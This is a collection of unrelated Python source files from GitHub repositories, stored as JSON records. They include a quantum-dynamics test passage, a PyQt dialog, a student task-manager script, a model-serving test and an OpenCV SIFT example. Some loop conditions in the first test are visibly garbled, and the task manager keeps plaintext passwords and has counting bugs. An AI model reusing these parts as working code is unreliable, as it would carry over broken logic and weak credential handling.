2E-3\n\n self.prepare_net(L, dt, hiddenSize=3, depth=1)\n\n sx = op.get_paulis()[0]\n XX_ = jnp.kron(sx, sx)\n M_2_body = jnp.array(\n [[jnp.kron(self.povm.M[i], self.povm.M[j]) for j in range(4)] for i in range(4)]).reshape(16, 4, 4)\n T_inv_2_body = jnp.kron(self.povm.T_inv, self.povm.T_inv)\n\n self.povm.add_dissipator(\"XX_\", op.matrix_to_povm(XX_, M_2_body, T_inv_2_body, mode=\"dissipative\"))\n\n Lindbladian = op.POVMOperator(self.povm)\n Lindbladian.add({\"name\": \"XX_\", \"strength\": 1.0, \"sites\": (0, 1)})\n Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (0,)})\n Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (1,)})\n Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (2,)})\n\n res = {\"X\": [], \"Y\": [], \"Z\": []}\n\n times = []\n t=0.\n while t0.005:\n self.stepper.set_dt(2.5e-2)\n\n dp, stepSize = self.stepper.step(0, self.tdvpEquation, self.psi.get_parameters(), hamiltonian=Lindbladian,\n psi=self.psi)\n \n t += stepSize\n\n self.psi.set_parameters(dp)\n\n times = jnp.array(times)\n\n # Analytical solution\n w = jnp.sqrt(35)\n Sx_avg = -jnp.sin(6 * times) / 3 - 4 / w * jnp.sin(w * times) * jnp.exp(-times)\n Sy_avg = jnp.cos(6 * times) / 3 + (2 / 3 * jnp.cos(w * times) - 2 / 3 / w * jnp.sin(w * times)) * jnp.exp(-times)\n Sz_avg = jnp.zeros_like(times)\n\n self.assertTrue(jnp.allclose(Sx_avg, jnp.asarray(res[\"X\"]), atol=1e-2))\n self.assertTrue(jnp.allclose(Sy_avg, jnp.asarray(res[\"Y\"]), atol=1e-2))\n self.assertTrue(jnp.allclose(Sz_avg, jnp.asarray(res[\"Z\"]), atol=1e-2))\n\n def test_time_evolution_three_site(self):\n # This tests the time evolution of a sample system and compares it with the analytical solution\n\n L = 3\n Tmax = 0.2\n dt = 5E-4\n\n self.prepare_net(L, dt, hiddenSize=3, depth=1)\n\n sx = op.get_paulis()[0]\n XXX = jnp.kron(jnp.kron(sx, sx), sx)\n M_3_body = jnp.array(\n [[[jnp.kron(jnp.kron(self.povm.M[i], self.povm.M[j]), self.povm.M[k]) for j in range(4)] for i in range(4)]\n for k in range(4)]).reshape(64, 8, 8)\n T_inv_3_body = jnp.kron(jnp.kron(self.povm.T_inv, self.povm.T_inv), self.povm.T_inv)\n\n self.povm.add_dissipator(\"XXX\", op.matrix_to_povm(XXX, M_3_body, T_inv_3_body, mode=\"dissipative\"))\n\n Lindbladian = op.POVMOperator(self.povm)\n Lindbladian.add({\"name\": \"XXX\", \"strength\": 1.0, \"sites\": (0, 1, 2)})\n Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (0,)})\n Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (1,)})\n Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (2,)})\n\n res = {\"X\": [], \"Y\": [], \"Z\": []}\n\n times = []\n t=0.\n while t0.003:\n self.stepper.set_dt(1e-2)\n\n dp, stepSize = self.stepper.step(0, self.tdvpEquation, self.psi.get_parameters(), hamiltonian=Lindbladian,\n psi=self.psi)\n \n t += stepSize\n\n self.psi.set_parameters(dp)\n\n times = jnp.array(times)\n\n # Analytical solution\n w = jnp.sqrt(35)\n Sx_avg = -6 * jnp.sin(w * times) * jnp.exp(-times) / w\n Sy_avg = jnp.cos(w * times) * jnp.exp(-times) - jnp.sin(w * times) * jnp.exp(-times) / w\n Sz_avg = jnp.zeros_like(times)\n\n print(Sx_avg - jnp.asarray(res[\"X\"]))\n self.assertTrue(jnp.allclose(Sx_avg, jnp.asarray(res[\"X\"]), atol=1e-2))\n self.assertTrue(jnp.allclose(Sy_avg, jnp.asarray(res[\"Y\"]), atol=1e-2))\n self.assertTrue(jnp.allclose(Sz_avg, jnp.asarray(res[\"Z\"]), atol=1e-2))\n\n def test_ground_state_search(self):\n L = 2\n dt = 1E-2\n\n self.prepare_net(L, dt)\n\n sz = op.get_paulis()[2]\n self.povm.add_imaginary(\"imag_Z\", op.matrix_to_povm(sz, self.povm.M, self.povm.T_inv, mode='imag'))\n\n Lindbladian = op.POVMOperator(self.povm)\n Lindbladian.add({\"name\": \"imag_Z\", \"strength\": 4., \"sites\": (0, )})\n Lindbladian.add({\"name\": \"imag_Z\", \"strength\": 4., \"sites\": (1, )})\n\n def measure_energy(confs, probs):\n return jnp.sum(jVMC.mpi_wrapper.global_mean(self.povm.observables[\"Z\"][confs], probs))\n\n for i in range(40):\n dp, _ = self.stepper.step(0, self.tdvpEquation, self.psi.get_parameters(), hamiltonian=Lindbladian,\n psi=self.psi)\n self.psi.set_parameters(dp)\n\n confs, _, probs = self.sampler.sample()\n self.assertTrue(jnp.allclose(measure_energy(confs, probs), -2, atol=1e-2))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"markusschmitt/vmc_jax","sub_path":"tests/povm_test.py","file_name":"povm_test.py","file_ext":"py","file_size_in_byte":12142,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"31"} +{"seq_id":"43083062278","text":"import sqblUI\nimport Canard_settings as settings\nimport isoLangCodes\nfrom PyQt4 import QtCore, QtGui\n\nclass Dialog(QtGui.QDialog, sqblUI.preferencesDialog.Ui_CanardPreferencesDialog):\n def __init__(self):\n super(Dialog,self).__init__()\n self.setupUi(self) \n self.tabWidget.setCurrentIndex(0) #Select the \"Canard\" Pane, means we can edit and save in QtDesigner on any tab as the active one, and still have the right one selected.\n self.setupDisplayLanguageCombo()\n self.setupDefaultLanguageList()\n self.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n\n def setupDisplayLanguageCombo(self):\n for code,title in isoLangCodes.languageCodeListPairs():\n self.defaultDisplayLanguage.addItem(title,code)\n self.defaultDisplayLanguage.insertSeparator(11) # insert after top 10\n langIndex = self.defaultDisplayLanguage.findData(settings.getPref('displayLanguage'))\n self.defaultDisplayLanguage.setCurrentIndex(max(0,langIndex))\n\n def setupDefaultLanguageList(self):\n self.possibleDefaultNewLangs.setSortingEnabled(True)\n self.defaultNewLangs.setSortingEnabled(True)\n for code,title in isoLangCodes.languageCodeListPairs(includeTopTen=False):\n item = QtGui.QListWidgetItem(title)\n item.setData(QtCore.Qt.UserRole,code)\n if code in settings.getPref('defaultObjectLangauges'):\n self.defaultNewLangs.addItem(item)\n else:\n self.possibleDefaultNewLangs.addItem(item)\n self.addDefaultNewLang.clicked.connect(self.addDefaultLang)\n self.removeDefaultNewLang.clicked.connect(self.removeDefaultLang)\n\n def addDefaultLang(self):\n self.fromListToList(self.possibleDefaultNewLangs,self.defaultNewLangs)\n def removeDefaultLang(self):\n self.fromListToList(self.defaultNewLangs,self.possibleDefaultNewLangs)\n def fromListToList(self,fromList,toList): \n for item in fromList.selectedItems():\n row = fromList.row(item)\n toList.addItem(\n fromList.takeItem(row)\n )\n\n def accept(self):\n settings.setPref('displayLanguage',\n self.defaultDisplayLanguage.itemData(\n self.defaultDisplayLanguage.currentIndex()\n ).toPyObject()\n )\n\n settings.setPref('defaultObjectLangauges',\n [ str(self.defaultNewLangs.item(i).data(QtCore.Qt.UserRole).toPyObject())\n for i in range(self.defaultNewLangs.count()) ]\n )\n\n settings.setPref('checkForUpdates', self.checkForUpdates.isChecked())\n\n QtGui.QDialog.accept(self)\n\n","repo_name":"LegoStormtroopr/canard","sub_path":"SQBLWidgets/CanardPreferenceDialog.py","file_name":"CanardPreferenceDialog.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"31"} +{"seq_id":"13025368035","text":"#=====importing libraries===========\nfrom datetime import date, timedelta, datetime\nfrom time import sleep\n\n#======= Define Functions ========#\n\n# create a dictionary of all users from a given text file\ndef user_dict(filename):\n\n # create dictionary to store usernames and passwords\n user_dict = {}\n\n # open the user.txt file to retreive credentials\n with open(filename, 'r') as f:\n contents = f.readlines()\n\n # loop through all lines, tokenise the username and password\n for i in range(0, len(contents)):\n tokenised = contents[i].split()\n\n # strip the comma from username and store as key value pairs in dictionary\n user_dict[tokenised[0].strip(\",\")] = tokenised[1]\n\n # return the dictionary of users\n return user_dict\n\n\n\n# create a dictionary of all the tasks in the task.txt file\ndef all_tasks(filename):\n \n # open tasks.txt text file and save each line as an element in the list 'tasks'\n with open(filename, 'r') as f:\n tasks = f.readlines()\n\n # 'task_list' will be a list of dictionaries \n task_list = []\n\n # check for empty lines in the file\n for line in tasks:\n if (line.strip() != ''):\n\n # loop through each task in the list, creating a dictionary for each one -\n # append the created dictionary to 'task_list'\n\n tokenised = line.split(', ')\n\n # strip the newline character from any elements in the line\n tokenised[5] = tokenised[5].strip('\\n')\n\n # create a dictionary for each task, each loop\n i = {} \n\n i['Task'] = tokenised[1]\n i['Assigned To'] = tokenised[0]\n i['Date Assigned'] = tokenised[3]\n i['Due Date'] = tokenised[4]\n i['Task Complete'] = tokenised[5]\n i['Task Description'] = tokenised[2]\n\n # append the dictionary for each task to 'task__list'\n task_list.append(i)\n\n return task_list\n\n\n# function to write a new user to the user.txt file from user input\ndef reg_user(user_dict):\n\n # get user input for new username\n new_user = input(\"\\nEnter the new username: \\n\").lower()\n\n # check username does not already exist\n if new_user in user_dict:\n print(\"\\nThis username is already in use\\n\")\n \n # get user input for new password\n else:\n new_pass = input(\"\\nEnter the new password: \\n\")\n\n # get user to enter password again and check they match\n new_pass_check = input(\"\\nEnter the password again to check for match: \\n\")\n\n while new_pass != new_pass_check:\n print(\"\\nThe passwords do not match. Try again: \\n\")\n\n new_pass_check = input(\"\\nEnter the password again to check for match: \\n\")\n \n else:\n # append 'a' new user details to user.txt\n with open('user.txt', 'a') as f:\n f.write('\\n' + new_user + ', ' + new_pass)\n pass\n\n return\n\n\n# function to add a new task to tasks.txt from user iput\ndef add_task(user_dict):\n\n # get username to add as owner of the new task\n user = input(\"\\nEnter the username associated with the task you wish to add: \\n\")\n\n # check user exists\n while user not in user_dict:\n print(\"\\nThe user you entered does not exist!\")\n\n user = input(\"\\nEnter the username associated with the task you wish to add: \\n\")\n\n # get title\n title = input(\"\\nEnter the title of the task you wish to add: \\n\")\n\n # get description\n description = input(\"\\nEnter a description of the task: \\n\")\n\n # get the due date of the task (cast to int if arithmetic action necessary)\n num_days = input(\"\\nEnter the number of days you have to complete the task: \\n\")\n\n # get the completion status of the task\n status = input(\"\\nHas the task been completed? Enter 'yes' or 'no': \\n\")\n\n # validate input matches acceptable parameters\n if status.lower() == 'yes':\n pass\n elif status.lower() == 'no':\n pass\n else:\n print(\"Input error. Please begin the process again.\\nHINT: Make sure you type either 'yes' or 'no'.\")\n\n # get the current date using our helper function\n today_date = todaysDate()\n print(today_date)\n\n # calculate the due date from the num days user input, using our helper function\n due_date = dateDelta(num_days)\n\n # write the new task to 'tasks.txt'\n with open('tasks.txt', 'a') as t:\n t.write(user + ', ' + title + ', ' + \n description + ', ' + str(today_date) + ', ' + str(due_date) + ', ' + status + ', ' + '\\n')\n\n return\n\n\n# function to view all tasks, taking the list of task dictionaries as a parameter\ndef view_all(task_list):\n\n # loop through each task dictionary in 'task_list'\n for i in range(len(task_list)):\n\n # create upper border\n print(\"\\n\", (\"-\" * 100))\n\n # present data in a readable format\n print(f\"Assigned To:\\t\\t\\t{task_list[i]['Assigned To']}\\nDate Assigned:\\t\\t\\t{datetime.strptime(task_list[i]['Date Assigned'], '%Y-%m-%d').strftime('%d %B %Y')}\\nDue Date:\\t\\t\\t{datetime.strptime(task_list[i]['Due Date'], '%Y-%m-%d').strftime('%d %B %Y')}\\nTask Complete:\\t\\t\\t{task_list[i]['Task Complete']}\\nTask Description:\\n {task_list[i]['Task Description']}\")\n\n # create lower border\n print(\"-\" * 100, '\\n')\n\n return \n\n\n# function to show tasks for a specific user. Takes username and the list of task dictionaries as input\ndef view_mine(user, task_list):\n\n # to count all tasks associated with current user\n count = 1\n\n # create a dictionary of indices that maps the index of each user task in the task_list with its sequential number in the dictionary\n indices = {}\n\n # loop over all tasks checking owner of task matches logged in user\n for i in range(len(task_list)):\n # if task owner matches current user...\n # ...save the data as: {count: i} where i is the index of the task in 'task_list'\n if task_list[i]['Assigned To'] == user:\n indices[count] = i\n count += 1\n pass\n\n # ask user to select to view all tasks, or a specific task by the user input number \n selection = int(input(\"Select specific tasks by number, or type '0' to view all. Type '-1' to return to menu: \\n\"))\n \n # if user enters -1, return to the main menu\n if selection == -1:\n return\n\n # show all tasks for the logged in user\n elif selection == 0:\n\n # print tasks in readable consistent format\n printAllTasks(task_list, indices)\n \n # validation check that user selection is not higher than the number of tasks\n elif selection > count-1:\n\n print(\"\\nError. Selection not recognised.\\n\")\n\n # print the selected task in readable consistent format\n else:\n\n # print task in readable format\n printTask(task_list, indices, selection)\n\n # ask user if the task is complete\n complete = input(\"\\nIs this task complete? Enter 'yes' or 'no': \\n\")\n\n # if task is completed, set 'Task Complete' to 'yes'\n if complete.lower() == 'yes':\n task_list[indices[selection]]['Task Complete'] = complete\n\n # write echanges to file\n writeChanges('tasks.txt', task_list)\n \n elif complete.lower() == 'no':\n\n # set 'task complete' field to 'no'\n task_list[indices[selection]]['Task Complete'] = complete\n\n # get input from user to edit task if desired\n edit = input(\"Would you like to edit the task? Type 'yes' or 'no': \")\n\n if edit == 'yes':\n field = input(\"\\nWould you like to edit the user field or the due date field? Type 'user' or 'date': \\n\")\n\n if field.lower() != 'date' and field.lower() != 'user':\n print(\"\\nError. Input not recognised\\n\")\n\n field = input(\"\\nWould you like to edit the user field or the due date field? Type 'user' or 'date': \\n\")\n\n elif field == 'user':\n new_user = input(\"\\nEnter the new username: \\n\")\n\n task_list[indices[selection]]['Assigned To'] = new_user \n \n elif field == 'date':\n num_days = input(\"\\nEnter how many days you have from now to complete the task: \\n\")\n \n # calculate the ne wdue date using our helper function 'dateDelta()'\n new_date = dateDelta(num_days)\n\n # access the 'Due Date' value from the task at the user selected index \n task_list[indices[selection]]['Due Date'] = new_date\n\n # call function to write changes to file\n writeChanges('tasks.txt', task_list)\n \n elif edit == 'no':\n print('\\n\\nOkay, exiting back to main menu.....\\n')\n\n else:\n print(\"\\nError. Input not recognised.\\n\\n\")\n\n # call function to write changes to file\n writeChanges('tasks.txt', task_list)\n\n # error message to notify user the input was not recognised\n else:\n print(\"\\nError. Input not recognised.\\n\")\n\n return\n\n\n# function to print task in readable format, takes list of task dictionaries, index dictionary and user selection (integer)\ndef printTask(task_list, indices, selection):\n \n # print out the task in readable form\n print(f\"\\nAssigned To:\\t\\t\\t{task_list[indices[selection]]['Assigned To']}\\nDate Assigned:\\t\\t\\t{datetime.strptime(task_list[indices[selection]]['Date Assigned'], '%Y-%m-%d').strftime('%d %B %Y')}\\nDue Date:\\t\\t\\t{datetime.strptime(task_list[indices[selection]]['Due Date'], '%Y-%m-%d').strftime('%d %B %Y')}\\nTask Complete:\\t\\t\\t{task_list[indices[selection]]['Task Complete']}\\nTask Description:\\n {task_list[indices[selection]]['Task Description']}\\n\")\n\n\n# function to print all tasks for specific user\ndef printAllTasks(task_list, indices):\n # print tasks in readable consistent format\n for i in indices.values():\n print(f\"\\nAssigned To:\\t\\t\\t{task_list[i]['Assigned To']}\\nDate Assigned:\\t\\t\\t{datetime.strptime(task_list[i]['Date Assigned'], '%Y-%m-%d').strftime('%d %B %Y')}\\nDue Date:\\t\\t\\t{datetime.strptime(task_list[i]['Due Date'], '%Y-%m-%d').strftime('%d %B %Y')}\\nTask Complete:\\t\\t\\t{task_list[i]['Task Complete']}\\nTask Description:\\n {task_list[i]['Task Description']}\\n\")\n\n\n# function to write changes to file\ndef writeChanges(filename, task_list):\n \n # write the amended task dictionaries to 'tasks.txt'\n # execute logic inside 'with' so as to be able to write each line without closing the file\n with open(filename, 'w') as f:\n # loop through each task dictionary in 'task_list'\n for i in task_list:\n # create list to append elements in the correct order before writing to 'tasks.txt'\n buffer = []\n buffer.append(i['Assigned To'])\n buffer.append(i['Task'])\n buffer.append(i['Task Description'])\n buffer.append(i['Date Assigned'])\n buffer.append(i['Due Date'])\n buffer.append(i['Task Complete'])\n \n # loop through the reorganised task, writing it to the tasks.txt file\n for j in buffer:\n # dont write a comma and space to the final element in the list\n if '\\n' not in j:\n f.write(j + ', ')\n else:\n f.write(j)\n \n # add a newline after every task\n f.write('\\n')\n \n # print message to let user know file is being updated, in visually recognisable way\n print(\"\\n\")\n for i in range(0,3):\n print(\"Writing changes....................\")\n sleep(0.5)\n print(\"\\nFile Updated\\n\")\n\n\n# function to return today's date\ndef todaysDate():\n today = date.today()\n today_date = today.strftime(\"%d %B %Y\")\n\n return today\n\n\n# function to return the date in readable format in a given number of days\ndef dateDelta(days):\n today = date.today()\n\n # calculate the due date from the num days user input\n due_date = (today + timedelta(days=int(days)))\n \n return due_date\n\nprint(dateDelta(10))\n\n# function to generate reports. Takes in task list and user dictionary\ndef generateReports(task_list, users):\n \n #=========== task_overview.txt ============#\n\n # get total number of tasks\n total_tasks = len(task_list)\n\n # get total number of completed and incomplete tasks\n tasks_complete = 0\n tasks_incomplete = 0\n\n for i in task_list:\n if i['Task Complete'] == 'yes':\n tasks_complete += 1\n\n # get total number of incomplete tasks\n else:\n tasks_incomplete += 1\n \n # get total number of tasks that are incomplete and past their due date\n # get todays date\n today_date = todaysDate()\n \n # count all past due tasks\n past_due = 0\n for i in task_list:\n # only count past due tasks it they are not complete\n if i['Task Complete'] != 'yes':\n # compare dates to find past due tasks\n\n # properly format date and datetime objects for comparison\n if (today_date) > (datetime.strptime(i['Due Date'], '%Y-%m-%d')).date():\n past_due += 1\n \n # write to task_overview.txt:\n with open('task_overview.txt', 'w') as f:\n f.write(f\"Total tasks: {total_tasks}\\nTotal Tasks Past Due: {past_due}\\nTotal tasks Complete: {tasks_complete}\\nTotal Tasks Incomplete: {tasks_incomplete}\\nPercentage of incomplete tasks: {round((tasks_incomplete / total_tasks) * 100, 2)}%\\nPercentage of tasks overdue: {round((past_due / total_tasks) * 100, 2)}%\")\n\n #=========== task_overview.txt End ============#\n\n\n\n #============= user_overview.txt ==================\n\n # total number of users registered\n total_users = len(users)\n\n # total number of tasks\n total_tasks = len(task_list)\n\n # total tasks for each user\n # create a dictionary that holds the username as key and the number of related tasks as value\n # user_task_dict = {}\n \n # for i in task_list:\n \n # user = i['Assigned To']\n # if user not in user_task_dict:\n # count = 1\n # user_task_dict[user] = count\n # else:\n # count = 2\n # user_task_dict[user] = count\n # count += 1\n \n total_user_tasks = dict()\n\n for i in task_list:\n user = i['Assigned To']\n if user not in total_user_tasks:\n total_user_tasks[user] = 1\n \n else:\n total_user_tasks[user] = total_user_tasks.get(user, 0) + 1\n\n # add users with 0 assigned tasks\n for i in task_list:\n user = i['Assigned To']\n if user not in total_user_tasks:\n total_user_tasks[user] = 0 \n \n # percentage of tasks assigned to each user that are completed\n user_complete_dict = {}\n for i in task_list:\n user = i['Assigned To']\n \n if user not in user_complete_dict:\n if i['Task Complete'] == 'yes':\n count = 1\n user_complete_dict[user] = count\n \n elif user == i['Assigned To']:\n if i['Task Complete'] == 'yes':\n count = 2\n user_complete_dict[user] = count\n count += 1\n\n # add users with 0 completed tasks\n for i in task_list:\n user = i['Assigned To']\n if user not in user_complete_dict:\n user_complete_dict[user] = 0\n\n # percentage of incomplete tasks for each user\n incomplete = dict()\n\n for i in task_list:\n user = i['Assigned To']\n if user not in incomplete:\n if i['Task Complete'] == 'no':\n incomplete[user] = 1\n else:\n if i['Task Complete'] == 'no':\n incomplete[user] = incomplete.get(user, 0) + 1\n \n # add users with 0 incomplete\n for i in task_list:\n user = i['Assigned To']\n if user not in incomplete:\n incomplete[user] = 0\n\n # percentage of overdue tasks for each user\n overdue = {}\n past_due = 1\n for i in task_list:\n user = i['Assigned To']\n\n if i['Task Complete'] == 'no':\n if user not in overdue:\n # properly format date and datetime objects for comparison\n if (today_date) > (datetime.strptime(i['Due Date'], '%Y-%m-%d')).date():\n overdue[user] = past_due\n \n else:\n if (today_date) > (datetime.strptime(i['Due Date'], '%Y-%m-%d')).date():\n past_due += 1\n overdue[user] = past_due\n \n # add users with 0 overdue tasks\n for i in task_list:\n user = i['Assigned To']\n if user not in overdue:\n overdue[user] = 0\n\n\n # write output in readable format to 'user_overview.txt' file\n with open('user_overview.txt', 'w') as f:\n f.write(f\"Total number of registered users: {total_users}\\nTotal number of tasks: {total_tasks}\\n\\nTotal Tasks Assigned to each User:\\n\")\n\n # total tasks for each user\n for key, val in total_user_tasks.items():\n f.write(f\"\\t{key}: {val}\\n\")\n\n # percent of tasks assigned to each user\n f.write(\"\\nPercentage of Tasks Assigned to Each User:\\n\")\n\n for key, val in total_user_tasks.items():\n percent = (val/len(task_list)*100)\n f.write(f\"\\t{key} has {round(percent, 2)}% of the total assigned tasks.\\n\")\n\n # percent of tasks completed by each user\n f.write(\"\\nPercentage of Tasks Completed by Each User:\\n\")\n\n for key, val in user_complete_dict.items():\n percent_complete = round((val/total_user_tasks[key])*100, 2)\n f.write(f\"\\t{key} has completed {percent_complete}% of tasks assigned.\\n\")\n\n # percent of tasks still to be completed\n f.write(\"\\nPercentage of Tasks Yet to be Completed by Each User:\\n\")\n\n for key, val in incomplete.items():\n percent_complete = round((val/total_user_tasks[key])*100, 2)\n f.write(f\"\\t{percent_complete}% of {key}'s tasks are incomplete.\\n\")\n\n # percent of overdue tasks yet to be completed\n f.write(\"\\nPercentage of Tasks Yet to be Completed that are Overdue:\\n\")\n\n for key, val in overdue.items():\n percent_past_due = round((val/total_user_tasks[key])*100, 2)\n f.write(f\"\\t{percent_past_due}% of {key}'s tasks are past due.\\n\")\n\n \n\n\n# function to show statistics\ndef showStats():\n\n # get total number of tasks\n with open('tasks.txt', 'r') as t:\n num_tasks = len(t.readlines())\n\n # get total number of users\n with open('user.txt', 'r') as u:\n num_users = len(u.readlines())\n\n print(f\"\\nThere are {num_tasks} tasks.\")\n print(f\"\\nThere are {num_users} users.\\n\")\n\n\n\n#============= Login Section ============#\n\n# get user dictionary from \nusers = user_dict('user.txt')\n\n# ask user for username\nusername = input(\"Enter your username: \\n\").lower()\n\n# check username exists in the dictionary\nwhile username.lower() not in users:\n print(\"Your username is not recognised\")\n\n # username should not be case sensitive\n username = input(\"Enter your username: \\n\").lower()\n\n# ask user for password\npassword = input(\"Enter your password: \\n\")\n\n# check user password against dictionary\nwhile password != users[username]:\n print(\"Your password is not recognised\")\n \n # password should be case sensitive\n password = input(\"Enter your password: \\n\")\n\n#============= Login Section End ============#\n\n\n\n#============= Show Menu ============#\nwhile True:\n\n # check whether to show admin or regular user menu\n if username.lower() == 'admin':\n menu = input('''Select one of the following options below\\n:\n s - show stats\n r - Registering a user\n a - Adding a task\n va - View all tasks\n vm - view my task\n gr - generate reports\n e - Exit\n: ''').lower()\n\n else:\n #presenting the menu to the user and \n # making sure that the user input is coneverted to lower case.\n menu = input('''Select one of the following options below\\n:\n r - Registering a user\n a - Adding a task\n va - View all tasks\n vm - view my task\n e - Exit\n : ''').lower()\n\n #============= Show Menu End ============#\n \n\n #============= Process User Choice ==============#\n\n # add new user if current user is admin\n if menu == 'r':\n\n # if current user is admin:\n if username.lower() == 'admin':\n # get latest user dictionary\n users = user_dict('user.txt')\n\n # call the register user function\n reg_user(users)\n \n # print error message if use does not have admin privileges\n else:\n print(f\"\\nThe user '{username}' does not have admin privileges, and cannot add new users.\\n\")\n\n # add new task\n elif menu == 'a':\n\n # get latest user dictionary\n users = user_dict('user.txt')\n\n add_task(users)\n\n elif menu == 'va':\n\n # get latest task dictionary\n tasks = all_tasks('tasks.txt')\n\n view_all(tasks)\n\n elif menu == 'vm':\n\n # get latest task dictionary\n tasks = all_tasks('tasks.txt')\n \n view_mine(username, tasks)\n \n # exit the program\n elif menu == 'e':\n print('Goodbye!!!')\n exit()\n\n # display total users and total tasks\n elif menu == 's':\n # if current user is admin:\n if username.lower() == 'admin':\n\n # call the show stats function\n showStats()\n\n\n # generate reports to 2 text files, 'task_overview' and 'user_overview'\n elif menu == 'gr':\n\n if username.lower() == 'admin':\n\n # get all tasks\n task_list = all_tasks('tasks.txt')\n\n # get all users\n users = user_dict('user.txt')\n\n # call the generate reports function\n generateReports(task_list, users)\n\n # let user know the files have been updated\n print(f\"\\n'task_overview.txt' and 'user_overview.txt' FILES UPDATED\\n\")\n\n else:\n print(\"\\nYou do not have admin privileges. Choose another option.\\n\")\n\n\n # error handling\n else:\n print(\"\\nYou have made a wrong choice, Please Try again\\n\")\n\n #============= Process User Choice End ==============#","repo_name":"TechTunist/capstone26","sub_path":"task_manager.py","file_name":"task_manager.py","file_ext":"py","file_size_in_byte":23156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74320157849","text":"from praxis import test_utils\nfrom saxml.server.pax.lm.params import lm_cloud\nfrom saxml.server.pax.lm.params import template\nimport tensorflow as tf\n\n\n@template.make_servable()\nclass TestModel(lm_cloud.LmCloudSpmd2BTest):\n ENABLE_GENERATE_STREAM = True\n MAX_SEQ_LEN = None\n\n\n@template.make_servable()\nclass TestModelMaxSequenceLength(TestModel):\n MAX_SEQ_LEN = 128\n\n\n@template.make_servable()\nclass TestLayerwiseModel(TestModel):\n\n def task(self):\n task_p = super().task()\n transformer_p = (\n task_p.model.lm_tpl.stacked_transformer_tpl.transformer_layer_params_tpl\n )\n transformer_p_list = []\n\n for _ in range(self.NUM_LAYERS):\n single_tr_p = transformer_p.clone()\n transformer_p_list.append(single_tr_p)\n\n task_p.model.lm_tpl.stacked_transformer_tpl.transformer_layer_params_tpl = (\n transformer_p_list\n )\n return task_p\n\n\nclass TemplateTest(tf.test.TestCase, test_utils.TestCase):\n\n def test_seqlen(self):\n config = TestModelMaxSequenceLength()\n self.assertEqual(\n config.generate().decoder.seqlen, TestModelMaxSequenceLength.MAX_SEQ_LEN\n )\n self.assertEqual(\n config.generate_stream().decoder.seqlen,\n TestModelMaxSequenceLength.MAX_SEQ_LEN,\n )\n\n config = TestModel()\n self.assertEqual(\n config.generate().decoder.seqlen,\n TestModel.INPUT_SEQ_LEN + TestModel.MAX_DECODE_STEPS,\n )\n self.assertEqual(\n config.generate_stream().decoder.seqlen,\n TestModel.INPUT_SEQ_LEN + TestModel.MAX_DECODE_STEPS,\n )\n\n config = TestLayerwiseModel()\n self.assertEqual(\n config.generate().decoder.seqlen,\n TestLayerwiseModel.INPUT_SEQ_LEN + TestLayerwiseModel.MAX_DECODE_STEPS,\n )\n self.assertEqual(\n config.generate_stream().decoder.seqlen,\n TestLayerwiseModel.INPUT_SEQ_LEN + TestLayerwiseModel.MAX_DECODE_STEPS,\n )\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"google/saxml","sub_path":"saxml/server/pax/lm/params/template_test.py","file_name":"template_test.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"31"} +{"seq_id":"4101174763","text":"import cv2\nimport numpy as np\n\nimage = cv2.imread(\"./img_data/mountain/match2.jpg\")\nimage_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# SIFT (Scale-Invariant Feature Transform)\n# Algos that detects object irrelavant to the scale and rotation of the image and reference\n# Return key points in the image to mark\n# Syntax: sift = cv2.xfeatures2D.SIFT_create()\n# key_point, descripter = sift.detectAndCompute(gray_image, optionValue=None)\n\n# Applying the function\nsift = cv2.xfeatures2d.SIFT_create()\nkp, des = sift.detectAndCompute(image_gray, None)\n \n\n# Applying the function\nkp_image = cv2.drawKeypoints(image, kp, None, color=(\n 0, 255, 0), flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\ncv2.imshow('SIFT', kp_image)\ncv2.waitKey()\n\n# SURF (Speeded-Up Robust Features)\n# SURF is faster than SIFT\n# SURF goes a little further than SIFT and approximates LoG with Box Filter\n# One big advantage of this approximation is that, convolution with box filter can be easily calculated with the help of integral images. \n# And it can be done in parallel for different scales. \n# Also the SURF rely on determinant of Hessian matrix for both scale and location\n# It is 3 times faster than SIFT while performance is comparable to SIFT. \n# SURF is good at handling images with blurring and rotation, but not good at handling viewpoint change and illumination change\n# Syntax:\n# surf = cv2.SURF_create()\n# kp, des = sift.detectAndCompute(image_gray, None)\n\n### Patented cant be use ###\n\n# surf = cv2.xfeatures2d.SURF_create()\n# kp, des = sift.detectAndCompute(image_gray, None)\n\n# kp_image = cv2.drawKeypoints(image, kp, None, color=(\n# 0, 255, 0), flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n# cv2.imshow('SURF', kp_image)\n# cv2.waitKey()\n","repo_name":"anhphan2705/Image-Feature-Matching","sub_path":"sift_surf_algo.py","file_name":"sift_surf_algo.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12086964311","text":"import numpy as np\nfrom . import predefined_maps as pmaps\nfrom . import utils\nimport matplotlib.pyplot as plt\n\nclass L2ExplorerMap(object):\n def __init__(self, map_id, cell_size=2):\n self.map_id = map_id\n (polygon_specs, xlim, ylim) = pmaps.get_map(map_id)\n self.xlim = tuple(xlim)\n self.ylim = tuple(ylim)\n self.occgrid = utils.OccupancyGrid(xlim=xlim, ylim=ylim, resolution=cell_size)\n self.polygons = []\n for poly_vertices in polygon_specs:\n poly = utils.MyPolygon(vertices=poly_vertices)\n self.occgrid.set_occupied_poly(poly)\n self.polygons.append(poly)\n self.obj_locs = {None: 